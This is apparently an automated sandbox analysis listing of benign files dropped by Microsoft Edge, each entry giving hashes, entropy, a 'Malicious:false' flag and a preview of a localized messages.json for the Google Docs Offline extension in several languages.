                                                                                                                                                                                                                                                                                                                    SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                                                                                    SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                                                                                    SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):1613
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                                                                                    MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                                                                                    SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                                                                                    SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                                                                                    SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):851
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                                    MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                                    SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                                    SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                                    SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):851
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                                    MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                                    SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                                    SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                                    SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):848
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                                                                                    MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                                                                    SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                                                                    SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                                                                                    SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):1425
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                                                                                    MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                                                                                    SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                                                                                    SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                                                                                    SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):961
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                                                                                    MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                                                                                    SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                                                                                    SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                                                                                    SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):959
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                                                                                    MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                                                                                    SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                                                                                    SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                                                                                                                    SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):968
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                                                                                                                    MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                                                                                                                    SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                                                                                                                    SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                                                                                                                    SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):838
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                                                                                                                                    MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                                                                                                                    SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                                                                                                                    SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                                                                                                                    SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):1305
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                                                                                    MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                                                                                                                    SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                                                                                    SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                                                                                    SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):911
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                                                                                                                    MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                                                                                                                    SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                                                                                                                    SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                                                                                                                    SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):939
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                                                                                                                    MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                                                                                                                    SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                                                                                                                    SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                                                                                                                    SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):977
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                                                                                    MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                                                                                    SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                                                                                    SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                                                                                                                    SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):972
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                                                                                    MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                                                                                                                    SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                                                                                    SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                                                                                    SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):990
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                                                                    Encrypted:false
